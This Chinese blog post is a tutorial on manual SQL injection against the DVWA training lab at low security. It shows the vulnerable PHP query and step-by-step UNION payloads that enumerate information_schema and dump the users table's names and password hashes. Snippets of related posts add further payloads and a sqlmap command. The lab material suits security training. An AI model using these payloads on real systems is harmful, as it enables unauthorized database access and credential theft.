DVWA之SQL注入的步骤

最新推荐文章于 2024-07-03 22:07:19 发布
最新推荐文章于 2024-07-03 22:07:19 发布
阅读量6.6k 收藏 67
点赞数 12
分类专栏: SQL注入 DVWA靶场通关 文章标签: mysql 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847838/article/details/109833310
版权

SQL注入步骤_dvwa

1. 查找注入点

    以dvwa靶场的low级别为例:
123在这里插入图片描述

1.1 判断注入的类型

    判断是否存在注入点并检验是字符型还是数字型
先输入正确的User ID:1,2,3 点 Submit 后,将正常显示信息
在这里插入图片描述
    输入错误的数据,例如9,10,11……结果是不显示(空白)
在这里插入图片描述

  1. 输入1’,出现报错
    在这里插入图片描述
    说明此处是注入点,接受相关参数未经正确处理直接带入数据库进行查询操作。
  2. 通常sql 注入漏洞会被分为2种类型 :数值型字符型
        输入1 and 1 = 2, 因为1=2为假,如果是数值型,按道理来讲页面会出现报错,但页面如下,没有报错
    在这里插入图片描述
        输入1’ and ‘1’ =’2,页面如下,则说明存在字符型注入
    在这里插入图片描述

字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

因此,我们可以猜测(仅是猜测)这里的sql语句应该是:

SELECT (某字段)FROM (某个表)WHERE userid = ‘’;

查看源代码

<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];
    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    // Get results
    while( $row = mysqli_fetch_assoc( $result ) ) {
        // Get values
        $first = $row["first_name"];
        $last  = $row["last_name"];
        // Feedback for end user
        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
    }
    mysqli_close($GLOBALS["___mysqli_ston"]);
}?>

第6行可以看出,语句为

query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

2. 获取字段数(order by 取临界值)

    通过order by看当前表中存在多少列,ORDER BY 语句用于根据指定的列对结果集进行排序。可以这么理解,如访问id=1 order by 3,页面返回与id=1相同的结果,输入id=1 order by 4,页面返回与id=1不同的结果,则字段数为3。

  1. 输入1’ order by 2# ,页面正常显示 (这里的#号是注释符,注释后面的引号)
    在这里插入图片描述
  2. 输入1’ order by 3# ,出现报错页面
    在这里插入图片描述
    这样我们就可以判断查询结果值为两列。

2.1 确定显示的位置(SQL语句查询之后的回显位置)

    输入1’ union select 1,2#
在这里插入图片描述
上图可以看到有两个回显,因此我们可以在回显处1和2中显示我们想要获得的信息

3. 查询当前的数据库,以及版本

注:mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。

  1. SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段
    SCHEMA_NAME,这个表中记录了数据库库名。

  2. TABLES表存储用户创建的所有数据库 库名和表名,字段分别为:
    TABLES_SCHEMA和TABLES_NAME

  3. COLUMNS表中存储用户创建的所有数据库的库名、表名、字段名,字段名分别为:
    TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME.

    输入1’ union select version(),database()#
在这里插入图片描述
在回显处,看到了数据库为dvwa,版本是5.5.53

4. 查询数据库中的表

    输入1’ union select table_name,2 from information_schema.tables where table_schema =‘dvwa’#
在这里插入图片描述
    可以看到一个users的表,根据字面意思,里面应该存放的是用户的信息,这是我们想要得到的,所以我们就针对这个users的表继续深入。

5. 查询表中的字段

    输入1’ union select column_name,2 from information_schema.columns where table_name =‘users’#
在这里插入图片描述
可以看到,在users表里面有user和password字段,我们继续尝试查看这两个字段的内容

    输入1’ union Select user,password from users#

在这里插入图片描述

可以看到密码被加密,可以使用相应工具进行解密;这里做个演示,以用户gordonb为例:
在这里插入图片描述
解密结果为abc123
到此成功拿到用户名密码相关信息。

    本站所有文章均为原创,欢迎转载,请注明文章出处:https://blog.csdn.net/weixin_43847838/article/details/109833310。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。*

归去来兮-zangcc
关注
专栏目录
DVWAsql注入(一)
ximo的博客
01-21 320
DVWAsql注入(一) 一、低级别 1.输入ID得到回显: 2.判断注入方式: 输入1’ and ‘1’ = ‘1’ # 成功回显: 输入1’ and ‘1’ = ‘2’ # 回显失败: 判断为单引号字符型注入。 3.判断列数与数据回显位置 使用 order by 语句判断列数。 使用 1’ order by 3 # 出现报错: 使用 1’ order by 2 # 成功回显,说明列数为 2: 4.使用 union 联合注入查询,可回显位置并获得当前库 使用 -1’ union select
SQL简单注入
weixin_44300286的博客
07-20 737
题目来源:https://www.ichunqiu.com/battalion 一、SQL 题目描述: 出题人就告诉你这是个注入,有种别走! 查看网页源码,发现源码中有select语句的信息,这下我们省事了。 根据源码可看出,注入点无闭合符号,我们先构造payload: id=1 --+ 发现页面正常显示,那么我们的猜想是正确的。 第一步判断字段数,输入: id=1 order by 1 ...
DVWA靶场SQL注入
最新发布
Tangyoo的博客
07-03 1126
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1341
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
DVWA网站SQL注入的初期探索
weixin_43941095的博客
08-11 128
先扫一下盲,介绍一下数字型注入和字符型注入的区别,额,其实我也是一知半解… 1、数字型注入与字符型注入 数字型注入与字符型注入的含义: 数字型注入指的是后台代码里的SQL语句里用户需要输入的值是数字,同理,字符型注入指的是用户需要输入的是字符,字符的话是以单引号闭合的。如下两个数字型注入和字符型注入的例子: Select * from users where id = x(用户输入值) Select * from users where id = ‘x’(用户输入值) 数字型注入判断: 当输入的参数 x
【小猪学渗透】打靶第1天:DVWA入门:SQL注入、SQL盲注
weixin_43521720的博客
03-18 1110
正确的语句是:1’ union select 1, group_concat(column_name) from information_schema.columns where table_name='‘users’#命令-D dvwa -T users -C user,password,user_id --dump:到最后算崩了,kali重启了- -nano修改之前的1.txt,改为抓弹出页的包,-second-url“”后面这个地址是第一个页面的地址。用抓的地址 sqlmap.py -u [地址]
DVWASQL注入
m0_67393157的博客
07-28 489
DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如。
DVWA-SQL注入
qq_60848021的博客
06-25 1201
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
SQL注入攻击(DVWA平台演示)
Olivia_2的博客
07-24 1835
一、SQL注入攻击介绍 SQL注入攻击是指构建特殊的输入作为参数传递给应用程序,这些参数属于SQL语法里的一些组合。这些参数插入到SQL语句中,破坏了原有的SQL语句的结构,通过SQL语句的执行,进而实现攻击者所要的操作。SQL注入攻击的对象是后端服务器的数据库系统。 二、实验环境 Win7操作系统、DVWA平台 三、DVWA演示SQL注入攻击 1、进入DVWA的登录首页(首页网址:http://localhost/DVWA-master/login.php)后,输入账号admin和密码passw
DVWA学习篇_SQL注入
求大佬师傅带
05-26 618
通过DVWA里的sql注入漏洞我们知道可以通过burp suite抓包更改id以及使用十六进制绕过单引号转义还可以通过/**/,制表符,换行符,括号,反引号绕过空格过滤;内联注释绕过(当内联注释版本号
DVWA-SQL注入通关
yuan_boss的博客
08-23 1593
由于源码中使用了mysqli_real_escape_string()函数对我们输入的数据进行转义了,所以无法使用字符型注入了,然而源码中的语句恰好不是字符型注入,而是数字型注入,又因为页面回显,所以可以使用联合注入获取数据库名。users表的字段:user_id,first_name,last_name,user,password,avatar,last_login,failed_login。通过单引号,双引号依次尝试,发现单引号会引发报错,而双引号不会报错,所以是使用单引号的字符串类型。
DVWASQL注入(低级)
heyingcheng的博客
11-17 2558
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
sql手工注入dvwa初级靶场
太阳照耀我走四方
02-13 1599
sql手工注入dvwa靶场
DVWA——SQL注入
m0_74426634的博客
04-07 1143
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWASQL注入
leo788的博客
07-26 338
使用sqlmap在dvwa上进行简单的sql注入实验
DVWA-SQL手工注入
2302_80164634的博客
02-03 2067
查完表名,查列名,语句是-1’ union select 1, group_concat(column_names) from information_schema.columns where table_name=’users’#如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。进行抓包,这里我的bp有了些问题,完了重下个,这里就引用一下一些查找的截屏。
DVWA练习——sql注入
haoaaao的博客
01-30 2619
一、sql injection (1)由于dvwa需要登录,因此直接无法获取数据库的内容,则需要在sql注入语句中添加网站的cookie以绕过登录 获取cookie: (2)sqlmap获取数据库: python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; securit..
dvwa靶场sql注入初级
07-27
对于DVWA靶场的SQL注入初级问题,你可以按照以下步骤进行操作: 1. 首先,打开DVWA靶场并登录。如果你还没有安装DVWA,请先下载并安装它。 2. 在DVWA的主界面上,选择"SQL Injection"选项卡。 3. 在"Select your difficulty"下拉菜单中选择"Low",这将设置为初级级别的SQL注入。 4. 点击"Submit"按钮,进入SQL注入页面。 5. 在输入框中输入一个单引号(')并点击"Submit"按钮。 6. 如果页面显示了错误信息,说明存在SQL注入漏洞。 7. 接下来,你可以尝试使用一些常见的SQL注入技巧,例如添加`OR '1'='1`到用户名或密码字段中,然后点击"Submit"按钮。 8. 如果页面成功返回了数据,说明你成功地进行了SQL注入攻击。 请注意,这只是一个初级级别的SQL注入漏洞,仅用于学习和测试目的。在实际应用中,请务必遵循安全规范,并采取必要的防护措施。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归去来兮-zangcc

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值